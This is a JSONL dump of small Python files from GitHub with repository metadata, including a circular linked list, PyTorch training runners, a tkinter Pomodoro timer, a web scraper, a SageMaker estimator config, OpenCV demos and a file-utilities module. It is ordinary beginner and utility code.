{"seq_id":"13207844305","text":"class Node():\n def __init__ (self,data):\n self.data = data\n self.next = None\n \nclass CircularLL():\n def __init__ (self):\n self.head = None\n self.tail = None\n def append(self,value):\n n = Node(value)\n if self.head:\n self.head.next = n\n self.head = n\n else:\n self.head = n\n self.tail = n\n self.head.next = self.tail\n \nc = CircularLL()\nc.append(10)\nc.append(20)\nc.append(30)\nc.append(40)\n\nfirst_node = c.tail\nprint(first_node.data)\nnode = first_node.next\nwhile node:\n if node.data != first_node.data:\n print(node.data)\n else:\n break\n node = node.next\n","repo_name":"basu-sanjana1619/python_projects","sub_path":"circular_LL.py","file_name":"circular_LL.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"72659585698","text":"import os\nimport sys\nimport time\nimport torch\nimport pathlib\nimport logging\nimport numpy as np\nfrom torch import nn\nfrom tqdm import tqdm\nfrom tensorboardX import SummaryWriter\nfrom utils.modelsummary import get_model_summary\nfrom utils.train_utils import AverageMeter, get_confusion_matrix, adjust_learning_rate, create_logger\n\n\ndef train(config, dataloader, model, loss_fn, optimizer, epoch, scaler, writer_dict):\n model.train()\n \n batch_time = AverageMeter()\n ave_loss = AverageMeter()\n tic = time.time()\n steps_per_epoch = len(dataloader) \n steps_tot = epoch*steps_per_epoch\n writer = writer_dict['writer']\n global_steps = writer_dict['train_global_steps']\n \n for step, batch in enumerate(dataloader):\n X, y, _, _ = batch\n X, y = X.cuda(), y.long().cuda()\n \n # Compute prediction and loss\n with torch.cuda.amp.autocast():\n pred = model(X)\n losses = loss_fn(pred, y)\n loss = losses.mean()\n \n # Backpropagation\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n optimizer.zero_grad()\n \n # measure elapsed time\n batch_time.update(time.time() - tic)\n tic = time.time()\n \n # update average loss\n ave_loss.update(loss.item())\n lr = adjust_learning_rate(\n optimizer, config['BASE_LR'], config['END_LR'], step+steps_tot, config['DECAY_STEPS'])\n optimizer.param_groups[0]['lr'] = lr\n \n msg = '\\r Training --- Iter:[{}/{}], Loss: {:.5f}, lr: {:.7f}, Time: {:.2f}'.format(\n step, steps_per_epoch, ave_loss.average(), optimizer.param_groups[0]['lr'], 
batch_time.average())\n #logging.info(msg)\n \n writer.add_scalar('train_loss', ave_loss.average(), global_steps)\n writer_dict['train_global_steps'] = global_steps + 1\n\n\ndef validate(config, dataloader, model, loss_fn, writer_dict):\n model.eval()\n \n ave_loss = AverageMeter()\n iter_steps = len(dataloader.dataset) // config['BATCH_SIZE'] \n confusion_matrix = np.zeros((config['NUM_CLASSES'], config['NUM_CLASSES'], 1))\n \n with torch.no_grad():\n for idx, batch in enumerate(dataloader):\n X, y, _, _ = batch\n size = y.size()\n X, y = X.cuda(), y.long().cuda()\n \n pred = model(X)\n losses = loss_fn(pred, y)\n loss = losses.mean() \n \n if not isinstance(pred, (list, tuple)):\n pred = [pred] \n for i, x in enumerate(pred):\n confusion_matrix[..., i] += get_confusion_matrix(\n y, x, size, config['NUM_CLASSES'], config['IGNORE_LABEL'])\n ave_loss.update(loss.item())\n \n pos = confusion_matrix[..., 0].sum(1)\n res = confusion_matrix[..., 0].sum(0)\n tp = np.diag(confusion_matrix[..., 0])\n IoU_array = (tp / np.maximum(1.0, pos + res - tp))\n mean_IoU = IoU_array.mean()\n \n writer = writer_dict['writer']\n global_steps = writer_dict['valid_global_steps']\n writer.add_scalar('valid_loss', ave_loss.average(), global_steps)\n writer.add_scalar('valid_mIoU', mean_IoU, global_steps)\n # trainid2label (train id -> label definition) is assumed to be provided by the surrounding module\n for key, val in trainid2label.items():\n if key != config['IGNORE_LABEL'] and key != -1:\n writer.add_scalar('valid_mIoU_{}'.format(val.name), IoU_array[key], global_steps) \n writer_dict['valid_global_steps'] = global_steps + 1\n \n return ave_loss.average(), mean_IoU, IoU_array\n\n\ndef testval(config, testloader, model, sv_dir='', sv_pred=False):\n model.eval()\n confusion_matrix = np.zeros((config['NUM_CLASSES'], config['NUM_CLASSES']))\n \n with torch.no_grad():\n for index, batch in enumerate(tqdm(testloader)):\n image, label, _, name, *border_padding = batch\n size = label.size()\n image, label = image.cuda(), label.long().cuda()\n pred = testloader.dataset.inference(model, image)\n\n confusion_matrix += get_confusion_matrix(\n label, pred, size, config['NUM_CLASSES'], config['IGNORE_LABEL'])\n\n if index % 100 == 0:\n logging.info('processing: %d images' % index)\n pos = confusion_matrix.sum(1)\n res = confusion_matrix.sum(0)\n tp = np.diag(confusion_matrix)\n IoU_array = (tp / np.maximum(1.0, pos + res - tp))\n mean_IoU = IoU_array.mean()\n logging.info('mIoU: %.4f' % (mean_IoU))\n \n if sv_pred:\n sv_path = os.path.join(sv_dir, 'test_results')\n if not os.path.exists(sv_path):\n os.mkdir(sv_path)\n testloader.dataset.save_pred(image, pred, sv_path, name)\n\n pos = confusion_matrix.sum(1)\n res = confusion_matrix.sum(0)\n tp = np.diag(confusion_matrix)\n pixel_acc = tp.sum()/pos.sum()\n mean_acc = (tp/np.maximum(1.0, pos)).mean()\n IoU_array = (tp / np.maximum(1.0, pos + res - tp))\n mean_IoU = IoU_array.mean()\n\n return mean_IoU, IoU_array, pixel_acc, mean_acc\n\n\ndef testvideo(config, testloader, model, sv_dir='', sv_pred=False):\n model.eval()\n\n with torch.no_grad():\n for index, batch in enumerate(tqdm(testloader)):\n image, _, name, *border_padding = batch\n size = image.size()\n image = image.cuda()\n pred = testloader.dataset.inference(model, image)\n \n if sv_pred:\n sv_path = os.path.join(sv_dir, 'video_frames')\n if not os.path.exists(sv_path):\n os.mkdir(sv_path)\n testloader.dataset.save_pred(image, pred, sv_path, name)\n\n 
print(\"done!\")\n","repo_name":"camlaedtke/pytorch_experiments","sub_path":"utils/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70882562339","text":"from tkinter import *\nimport math\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimers = None\n\n\n# ---------------------------- TIMER RESET ------------------------------- #\ndef reset_timer():\n window.after_cancel(timers)\n timer.config(text=\"Timer\", fg=GREEN)\n check_mark.config(text=\"\")\n my_canvas.itemconfig(timer_text, text=\"00:00\")\n global reps\n reps = 0\n\n\n\n# ---------------------------- TIMER MECHANISM ------------------------------- # \ndef start_button():\n global reps\n reps+=1\n\n if reps % 8 == 0:\n count_down(60*LONG_BREAK_MIN)\n change_title(\"Long Break\", PINK)\n elif reps % 2 == 0:\n count_down(60*SHORT_BREAK_MIN)\n change_title(\"Break\", RED)\n else:\n\n count_down(60 * WORK_MIN)\n change_title(\"Work\", GREEN)\n new_mark = \"\"\n work_session = math.floor(reps/2)\n for x in range(work_session):\n new_mark += \"✔\"\n check_mark.config(text=new_mark)\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- # \ndef count_down(count):\n global timers\n count_min = math.floor(count/ 60)\n count_sec = count % 60\n if count_sec < 10:\n count_sec = f\"0{count_sec}\"\n if count_sec ==0:\n count_sec =\"00\"\n if count_min == 0:\n count_min = \"00\"\n my_canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n timers = window.after(1000, count_down, count-1)\n else:\n start_button()\n\n# ---------------------------- UI SETUP ------------------------------- #\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg= YELLOW)\n\nmy_canvas = Canvas(width=200, height=224, bg= YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\n\nmy_canvas.create_image(100, 112, image=tomato_img)\ntimer_text = my_canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\nmy_canvas.grid(row=1, column=1)\n\n\n\ntimer = Label(text=\"Timer\", font=(FONT_NAME, 40, \"bold\"), bg=YELLOW, fg=GREEN)\ntimer.grid(row=0, column=1)\n\ndef change_title(textn, color):\n timer.config(text=textn, fg=color, font=(FONT_NAME, 40, \"bold\"), bg=YELLOW)\n\n\nstar_button = Button(text=\"Start\", command=start_button, highlightthickness=0)\nstar_button.grid(row=2, column=0)\n\nreset_button = Button(text=\"Reset\", command=reset_timer, highlightthickness=0)\nreset_button.grid(row=2, column=2)\n\ncheck_mark = Label(font=(FONT_NAME, 15, \"normal\"), bg=YELLOW, fg=GREEN)\ncheck_mark.grid(row=3, column=1)\nmark = \"\"\n\n\n\n\n\n\nwindow.mainloop()","repo_name":"dilshod996/pomodoro-times","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73331331937","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = ''\n__author__ = 'PJ'\n__mtime__ = '2018/3/14'\n# code is far away from bugs with the god animal protecting\n I love animals. 
They taste delicious.\n\"\"\"\n\nfrom urllib import request, parse\nfrom bs4 import BeautifulSoup\nimport re\n\nhttp = 'http://www.10010.com/net5/051/'\n\ndef Login():\n\treq = request.Request(http)\n\turl = request.urlopen(req)\n\tbsObj = BeautifulSoup(url.read(), 'lxml')\n\n\tfor a in bsObj.findAll('div', class_=re.compile('user_phone line_block cur_pointer fl')):\n\t\tprint(a)\n\nif __name__ == '__main__':\n    Login()","repo_name":"SilenceJR/mzi","sub_path":"联通.py","file_name":"联通.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27555612972","text":"import os\nfrom sagemaker.tensorflow import TensorFlow\n\n# ESTIMATOR CONFIGURATION\nJOB_NAME='example-tf-estimator-with-io'\nTAGS=[\n    {\"Key\":\"info:creator\",\n     \"Value\":\"theodoros\"},\n    {\"Key\":\"info:maintainer\",\n     \"Value\":\"theodoros\"},\n    {\"Key\":\"info:product\",\n     \"Value\":\"datascience\"},\n    {\"Key\":\"info:env\",\n     \"Value\":\"dev\"},\n]\n\nROLE_SAGEMAKER='arn:aws:iam::513905722774:role/service-role/AmazonSageMaker-ExecutionRole-20200914T153095'\nINSTANCE_TYPE='ml.p3.2xlarge'\nINSTANCE_COUNT=1\n\nPYTHON_VERSION='py3'\nTF_VERSION='1.15'\n\nMODEL_DIR = '/opt/ml/model'\nMODEL_FILE=os.path.join(\"..\",\"Scripts\",\"audio_tf_training_with_io.py\")\nOUTPUT_PATH='s3://sagemaker-us-east-1-513905722774/sagemaker_examples/trained_model'\n\n# MODEL CONFIGURATION\nHYPERPARAMETERS = {\n    'epochs': 50,\n    'batch_size': 4,\n    'learning_rate': 0.0001\n}\n\n\n# FIT CONFIGURATION\nINPUTS={\n    'train':'s3://sagemaker-us-east-1-513905722774/sagemaker_examples/data/temp_audio_features/train',\n    'test':'s3://sagemaker-us-east-1-513905722774/sagemaker_examples/data/temp_audio_features/test'\n}\n\n\n\n# ESTIMATOR BUILD AND FIT\nestimator = TensorFlow(\n    hyperparameters=HYPERPARAMETERS,\n    base_job_name=JOB_NAME,\n    tags=TAGS,\n    py_version=PYTHON_VERSION,\n    framework_version=TF_VERSION,\n    role=ROLE_SAGEMAKER,\n    instance_type=INSTANCE_TYPE,\n    instance_count=INSTANCE_COUNT,\n    model_dir=MODEL_DIR,\n    entry_point=MODEL_FILE,\n    output_path=OUTPUT_PATH\n)\nestimator.fit(INPUTS)\n","repo_name":"grigorisB/AWS_Examples","sub_path":"SageMaker/tf_estimator_with_io.py","file_name":"tf_estimator_with_io.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30908595707","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"res/tiger.jpg\")\n\nhor = np.hstack((img, img, img))\nver = np.vstack((img,img))\n\ncv2.imshow(\"horizontal\", hor)\ncv2.imshow(\"vertical\", ver)\n\n\nwhile True:\n    if cv2.waitKey(0) & 0xFF == ord(\"q\"):\n        break","repo_name":"tigerbombz/ATHackathon","sub_path":"chapter6.py","file_name":"chapter6.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"38319690968","text":"a = input(\"Enter some numbers \").split()\n\n# using sort()\n# a.sort()\n# print(a[0], a[len(a)-1])\n\n# without using sort()\nlargest = int(a[0])\nsmallest = int(a[0])\nfor i in a:\n    i = int(i)\n    if i > largest:\n        largest = i\nfor j in a:\n    j = int(j)\n    if j < smallest:\n        smallest = j\n\nprint(\"maximum: \", largest, \"minimum: \", smallest)\n","repo_name":"gmonu/Python-Programs","sub_path":"python450/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"35559178004","text":"import 
errno\nimport fnmatch\nimport hashlib\nimport logging\nimport os\nimport platform\nimport re\nimport shutil\nimport tempfile\nfrom datetime import datetime\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import List, Dict, Any, Tuple, Iterable\nfrom stat import ST_SIZE\nfrom stat import ST_MTIME\n\nimport humanize\n\nfrom pythoncommons.date_utils import timeit\n\nLOG = logging.getLogger(__name__)\n\n\nclass FileMatchType(Enum):\n regex = \"regex\"\n fnmatch = \"fnmatch\"\n\n\nclass FindResultType(Enum):\n FILES = \"files\"\n DIRS = \"dirs\"\n\n\nclass FileFinderCriteria:\n def __init__(self, exclude_dirs, extension, regex_pattern, parent_dir, full_path_result):\n self.exclude_dirs = exclude_dirs\n self.extension = extension\n self.regex_pattern = regex_pattern\n self.full_path_result = full_path_result\n self.parent_dir = parent_dir\n\n\nclass FileFinder:\n old_debug: bool = False\n debug: bool = False\n LOG_PREFIX = \"[FINDING FILES]\"\n\n @classmethod\n def _smartlog(cls, s: str):\n if cls.debug:\n LOG.debug(f\"{cls.LOG_PREFIX} {s}\")\n\n @classmethod\n def _is_file_matches_criteria(cls, file, parent_dir, criteria: FileFinderCriteria):\n if (\n (criteria.extension and not file.endswith(\".\" + criteria.extension))\n or (criteria.regex_pattern and not criteria.regex_pattern.match(file))\n or (criteria.parent_dir and not criteria.parent_dir == parent_dir)\n ):\n return False\n return True\n\n @staticmethod\n def _get_os_walk_kwargs(exclude_dirs):\n oswalk_kwargs: Dict[str, Any] = {}\n if exclude_dirs:\n # When topdown is True, the caller can modify the dirnames list in-place\n # (perhaps using del or slice assignment),\n # and walk() will only recurse into the subdirectories whose names remain in dirnames;\n # this can be used to prune the search\n oswalk_kwargs[\"topdown\"] = True\n return oswalk_kwargs\n\n @classmethod\n def _handle_dir_exclusions(cls, dirs, exclude_dirs):\n if exclude_dirs:\n # Not enough to check against basename(root) as all other dirs underneath will be walked on the next\n # invocation of the walk generator with the loop statement\n orig_dirs = dirs.copy()\n dirs[:] = [d for d in dirs if d not in exclude_dirs]\n if len(orig_dirs) != len(dirs):\n cls._smartlog(f\"Excluded dirs: {list(set(orig_dirs) - set(dirs))}\")\n return dirs\n\n @classmethod\n def _find_files(cls, root, files, criteria: FileFinderCriteria) -> List[str]:\n result: List[str] = []\n for file in files:\n cls._smartlog(f\"Processing file: {file}\")\n if cls._is_file_matches_criteria(file, FileUtils.basename(root), criteria):\n cls._smartlog(f\"File matched: {file}\")\n if criteria.full_path_result:\n result.append(FileUtils.join_path(root, file))\n else:\n result.append(file)\n return result\n\n @classmethod\n def _find_dirs(cls, root, dirs, criteria: FileFinderCriteria) -> List[str]:\n result: List[str] = []\n for dir in dirs:\n cls._smartlog(f\"Processing dir: {dir}\")\n if cls._is_file_matches_criteria(dir, FileUtils.basename(root), criteria):\n cls._smartlog(f\"Dir matched: {dir}\")\n if criteria.full_path_result:\n result.append(FileUtils.join_path(root, dir))\n else:\n result.append(dir)\n return result\n\n @classmethod\n def find_files(\n cls,\n basedir: str,\n find_type: FindResultType,\n regex: str = None,\n parent_dir: str = None,\n single_level=False,\n full_path_result=False,\n extension=None,\n debug=False,\n exclude_dirs: List[str] = None,\n ensure_number_of_results: int = None,\n ):\n cls.old_debug = cls.debug\n cls.debug = debug\n find_criteria: FileFinderCriteria = 
cls._get_criteria_from_args(\n exclude_dirs, extension, regex, parent_dir, full_path_result\n )\n result_files: List[str] = []\n for root, dirs, files in os.walk(basedir, **FileFinder._get_os_walk_kwargs(exclude_dirs)):\n cls._smartlog(f\"Processing root: {root}, dirs: {dirs}\")\n dirs[:] = cls._handle_dir_exclusions(dirs, exclude_dirs)\n if find_type == FindResultType.FILES:\n result_files.extend(cls._find_files(root, files, find_criteria))\n elif find_type == FindResultType.DIRS:\n result_files.extend(cls._find_dirs(root, dirs, find_criteria))\n if single_level:\n # TODO bug: if single level = True, ensure_number_of_results validation won't be executed\n return result_files\n cls.debug = cls.old_debug\n\n if ensure_number_of_results:\n if len(result_files) != ensure_number_of_results:\n raise ValueError(\n \"Number of results is not equal to expected result size! Expected: {}, Actual: {}\".format(\n ensure_number_of_results, len(result_files)\n )\n )\n return result_files\n\n @classmethod\n def _get_criteria_from_args(cls, exclude_dirs, extension, regex, parent_dir, full_path_result):\n saved_args = locals().copy()\n cls._smartlog(f\"Received args: {saved_args}\")\n if not exclude_dirs:\n exclude_dirs = []\n # Preprocess\n if extension:\n if extension.startswith(\".\") or extension.startswith(\"*.\"):\n extension = extension.split(\".\")[-1]\n cls._smartlog(f\"Filtering files with extension: {extension}\")\n regex_pattern = re.compile(regex) if regex else None\n cls._smartlog(f\"Modified args: {locals()}\")\n return FileFinderCriteria(exclude_dirs, extension, regex_pattern, parent_dir, full_path_result)\n\n\nclass FileUtils:\n previous_cwd = None\n\n # TODO consolidate with save_to_file\n @classmethod\n def write_to_file(cls, file_path, data, bytes=False):\n file_access_mode = \"w\"\n if bytes:\n file_access_mode = \"wb\"\n f = open(file_path, file_access_mode)\n f.write(data)\n f.close()\n\n @classmethod\n def write_to_tempfile(cls, contents):\n tmp = tempfile.NamedTemporaryFile(delete=False)\n with open(tmp.name, \"w\") as f:\n f.write(contents)\n return tmp.name\n\n @classmethod\n def save_to_file(cls, file_path, contents):\n FileUtils.ensure_file_exists(file_path, create=True)\n file = open(file_path, \"w\")\n file.write(contents)\n file.close()\n\n @classmethod\n def append_to_file(cls, file_path, contents):\n file = open(file_path, \"a\")\n file.write(contents)\n file.close()\n\n @classmethod\n def prepend_to_file(cls, file, line):\n with open(file, \"r+\") as f:\n content = f.read()\n f.seek(0, 0)\n f.write(line.rstrip(\"\\r\\n\") + \"\\n\" + content)\n\n @classmethod\n def append_data_to_file(cls, path, data):\n dirname = os.path.dirname(path)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n file = open(path, \"a\")\n file.write(data)\n file.close()\n\n @classmethod\n def ensure_dir_created(cls, dirname, log_exception=False):\n \"\"\"\n Ensure that a named directory exists; if it does not, attempt to create it.\n \"\"\"\n try:\n os.makedirs(dirname)\n except OSError as e:\n if log_exception:\n LOG.exception(\"Failed to create dirs\", exc_info=True)\n # If Errno is File exists, don't raise Exception\n if e.errno != errno.EEXIST:\n raise\n return dirname\n\n @classmethod\n def ensure_all_files_exist(cls, files):\n for file in files:\n if not os.path.isfile(file):\n raise Exception(file + \" does not exist!\")\n\n @classmethod\n def ensure_file_exists(cls, path, create=False):\n if not path:\n raise ValueError(\"Path parameter should not be None or empty!\")\n\n if not 
create and not os.path.exists(path):\n raise ValueError(\"No such file or directory: {}\".format(path))\n\n path_comps = path.split(os.sep)\n dirs = path_comps[:-1]\n dirpath = os.sep.join(dirs)\n if not os.path.exists(dirpath):\n LOG.info(\"Creating dirs: %s\", dirpath)\n FileUtils.ensure_dir_created(dirpath, log_exception=False)\n\n if not os.path.exists(path):\n # Create empty file: https://stackoverflow.com/a/12654798/1106893\n LOG.info(\"Creating file: %s\", path)\n open(path, \"a\").close()\n\n @classmethod\n def ensure_file_exists_and_readable(cls, file, verbose=False):\n if verbose:\n LOG.info(\"Trying to open file %s for reading..\", file)\n f = open(file, \"r\")\n if not f.readable():\n raise ValueError(\"File {} is not readable\".format(file))\n return file\n\n @classmethod\n def ensure_file_exists_and_writable(cls, file, verbose=False):\n if verbose:\n LOG.info(\"Trying to open file %s for writing..\", file)\n f = open(file, \"w\")\n if not f.writable():\n raise ValueError(\"File {} is not readable\".format(file))\n return file\n\n @classmethod\n def ensure_dir_is_writable(cls, d):\n is_dir = FileUtils.is_dir(d)\n if not is_dir:\n raise ValueError(\"%s is not a directory!\", d)\n\n writable = os.access(d, os.W_OK)\n if not writable:\n raise ValueError(\"Directory is not writable: %s\", d)\n\n @classmethod\n def ensure_parent_dir_is_writable(cls, f):\n path = Path(f)\n parent_dir = path.parent\n writable = os.access(parent_dir.__str__(), os.W_OK)\n if not writable:\n raise ValueError(\"Parent directory is not writable: %s\", parent_dir)\n\n @classmethod\n def ensure_dir_is_empty(cls, d):\n is_dir = FileUtils.is_dir(d)\n if not is_dir:\n raise ValueError(\"%s is not a directory!\", d)\n\n if not FileUtils.is_dir_empty(d):\n raise ValueError(\"Directory is not empty: %s\", d)\n\n @classmethod\n def is_dir_empty(cls, d):\n children = os.listdir(d)\n if len(children) == 0:\n return True\n return False\n\n @staticmethod\n def search_files(basedir, filename):\n result = []\n for dp, dn, filenames in os.walk(basedir):\n for f in filenames:\n if f == filename:\n result.append(os.path.join(dp, f))\n return result\n\n @staticmethod\n def search_dir(basedir, dirname):\n result = []\n for root, dirs, files in os.walk(basedir):\n for d in dirs:\n if d == dirname:\n return os.path.join(root, d)\n return result\n\n @staticmethod\n def find_repo_root_dir(current_script: str, root_dir_name: str, raise_error=True):\n orig_path = os.path.realpath(current_script)\n path = orig_path\n visited = [path]\n while path != os.sep and not path.endswith(root_dir_name):\n path = FileUtils.get_parent_dir_name(path)\n visited.append(path)\n if path == os.sep:\n message = \"Failed to find directory '{}' starting from path '{}'. 
\" \"Visited: {}\".format(\n root_dir_name, orig_path, visited\n )\n if raise_error:\n raise ValueError(message)\n else:\n LOG.error(message)\n return path\n\n @staticmethod\n def find_repo_root_dir_auto(curr_file, files_to_search: List[str] = None, raise_error=True):\n def _does_files_exist_in_dir(d):\n if not FileUtils.is_dir(d, throw_ex=False):\n return False\n LOG.debug(f\"Listing files in dir {d}\")\n files = os.listdir(d)\n LOG.debug(f\"Found files in dir '{d}': {files}\")\n return all(f in files and FileUtils.is_file(FileUtils.join_path(d, f)) for f in files_to_search)\n\n if not files_to_search:\n files_to_search = [\"pyproject.toml\"]\n\n orig_path = os.path.realpath(curr_file)\n path = orig_path\n visited = [path]\n while path != os.sep and not _does_files_exist_in_dir(path):\n LOG.debug(f\"Finding root dir: Current path is: {path}\")\n path = FileUtils.get_parent_dir_name(path)\n LOG.debug(f\"Finding root dir: Moving up the path, new path is: {path}\")\n visited.append(path)\n\n if raise_error and path == os.sep:\n raise ValueError(\n f\"Failed to find project root directory starting from path '{orig_path}'. \" f\"Visited: {visited}\"\n )\n\n return path, visited\n\n # TODO rename method\n @classmethod\n def find_files(\n cls,\n basedir,\n find_type: FindResultType = FindResultType.FILES,\n regex: str = None,\n parent_dir: str = None,\n single_level=False,\n full_path_result=False,\n extension=None,\n debug=False,\n exclude_dirs: List[str] = None,\n ensure_number_of_results: int = None,\n ):\n args = locals().copy()\n del args[\"cls\"]\n return FileFinder.find_files(**args)\n\n @staticmethod\n def list_files_in_dir(dir, pattern=None):\n LOG.info(\"Listing files in dir: \" + dir)\n if not pattern:\n result = [f for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]\n else:\n result = []\n for f in os.listdir(dir):\n file_path = os.path.join(dir, f)\n if os.path.isfile(file_path) and FileUtils.does_filename_match(f, pattern, FileMatchType.fnmatch):\n result.append(file_path)\n return result\n\n @classmethod\n def does_filename_match(cls, filename, pattern, pattern_match_type):\n if pattern_match_type == FileMatchType.fnmatch and fnmatch.fnmatch(filename, pattern):\n return True\n elif pattern_match_type == FileMatchType.regex and re.search(pattern, filename, re.DOTALL):\n return True\n return False\n\n @classmethod\n def get_path_from_basedir(cls, basedir, path, include_last_dir=False):\n basedir_idx = path.rindex(basedir)\n start_idx = basedir_idx + len(basedir)\n if not basedir[-1] == os.sep:\n start_idx += len(os.sep)\n if include_last_dir:\n end_idx = len(path)\n else:\n end_idx = path.rindex(os.path.sep) + 1\n return path[start_idx:end_idx]\n\n @classmethod\n def remove_files(cls, dir, pattern):\n from pythoncommons.string_utils import RegexUtils\n\n if not FileUtils.does_file_exist(dir):\n LOG.warning(\"Directory does not exist: %s\", dir)\n return\n for filename in os.listdir(dir):\n file_path = FileUtils.join_path(dir, filename)\n matches = RegexUtils.ensure_matches_pattern(FileUtils.path_basename(file_path), pattern)\n if not matches:\n LOG.debug(\"Filename not matched: %s\", file_path)\n continue\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n LOG.debug(\"Successfully removed file: %s\", file_path)\n except Exception as e:\n LOG.error(\"Failed to delete %s. 
Reason: %s\", file_path, e)\n\n    @classmethod\n    def remove_file(cls, path):\n        if not os.path.exists(path):\n            LOG.warning(\"Cannot remove file as it does not exist: %s\", path)\n            return\n        os.remove(path)\n\n    @classmethod\n    def remove_all_files_in_dir(cls, dir, endswith=\"lock\"):\n        if not os.path.exists(dir):\n            LOG.error(\"Can't delete files in dir as dir does not exist: %s\", dir)\n            return\n        for filename in os.listdir(dir):\n            file_path = os.path.join(dir, filename)\n            try:\n                if os.path.isfile(file_path) or os.path.islink(file_path):\n                    if endswith:\n                        if file_path.endswith(endswith):\n                            os.unlink(file_path)\n                        else:\n                            LOG.warning(\"Skip removing file, does not end with: %s\", endswith)\n                    else:\n                        os.unlink(file_path)\n                # elif os.path.isdir(file_path):\n                #     shutil.rmtree(file_path)\n            except Exception as e:\n                print(\"Failed to delete %s. Reason: %s\" % (file_path, e))\n\n    @classmethod\n    def remove_dir(cls, dir, force=False):\n        protected_dirs = (\"/\", \"~\")\n        if dir in protected_dirs:\n            LOG.warning(\n                \"Remove dir was invoked with directory: %s, which is in the protected dirs: %s\", dir, protected_dirs\n            )\n            return\n        if force:\n            shutil.rmtree(dir, ignore_errors=True)\n        else:\n            os.rmdir(dir)\n\n    @staticmethod\n    def copy_files_to_dir(files: List[str], dst_dir: str, cut_path: str = None, cut_basedir: bool = False):\n        LOG.debug(\"Copying files '%s' to destination dir: '%s'\", files, dst_dir)\n        for f in files:\n            dest_filename = f\n            if cut_path:\n                if not f.startswith(cut_path):\n                    raise ValueError(f\"Expected cut_path '{cut_path}' to be in beginning of file's full path: {f}\")\n                dest_filename = FileUtils.join_path(*f.split(cut_path))\n                if dest_filename.startswith(os.sep):\n                    dest_filename = dest_filename[1:]\n            if cut_basedir:\n                dest_filename = os.path.basename(f)\n\n            dest_file_path = os.path.join(dst_dir, dest_filename)\n            FileUtils.ensure_file_exists(dest_file_path, create=True)\n            LOG.debug(\"Copying %s to %s\", f, dest_file_path)\n            shutil.copyfile(f, dest_file_path)\n\n    @staticmethod\n    def copy_file_to_dir(src_file, dst_dir, dst_file_name_func, msg_template=None):\n        dest_filename = dst_file_name_func(src_file, dst_dir)\n        dest_file_path = os.path.join(dst_dir, dest_filename)\n\n        if msg_template:\n            LOG.info(msg_template.format(src_file, dest_file_path))\n        shutil.copyfile(src_file, dest_file_path)\n        return dest_file_path\n\n    @classmethod\n    def get_formatted_file_sizes_in_dir(cls, db_copies_dir, since: datetime = None):\n        result = \"\"\n        file_data = cls.get_file_sizes_with_mod_dates_in_dir(db_copies_dir)\n        for fd in file_data:\n            include = True\n            if since:\n                mod_date_of_file = datetime.fromtimestamp(float(fd[2]))\n                if mod_date_of_file < since:\n                    include = False\n                    LOG.debug(f\"Mod date of file < since, dropping it. 
File was: {fd[0]}\")\n\n if include:\n human_readable_size = humanize.naturalsize(fd[1], gnu=True)\n result += \"{size} {file}\\n\".format(size=human_readable_size, file=fd[0])\n return result\n\n @classmethod\n def get_file_sizes_in_dir(cls, db_copies_dir):\n return cls._get_files_with_attrs_in_dir(db_copies_dir, [ST_SIZE])\n\n @classmethod\n def _get_files_with_attrs_in_dir(cls, db_copies_dir: str, stat_attrs_idx: List[int]):\n files = os.listdir(db_copies_dir)\n result = []\n for f in files:\n file_path = os.path.join(db_copies_dir, f)\n tup = (file_path,)\n for attr_idx in stat_attrs_idx:\n file_stats = os.stat(file_path)\n tup = tup + (file_stats[attr_idx],)\n result.append(tup)\n return result\n\n @classmethod\n def get_creation_time(cls, file_path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n Answer: https://stackoverflow.com/a/39501288/1106893\n \"\"\"\n if platform.system() == \"Windows\":\n return os.path.getctime(file_path)\n else:\n stat = os.stat(file_path)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n @classmethod\n def get_file_sizes_with_mod_dates_in_dir(cls, dir):\n return cls._get_files_with_attrs_in_dir(dir, [ST_SIZE, ST_MTIME])\n\n @classmethod\n def get_file_extension(cls, filename):\n filename, ext = os.path.splitext(filename)\n ext = ext.replace(\".\", \"\")\n return ext\n\n @classmethod\n def does_file_exist(cls, file):\n return os.path.exists(file)\n\n 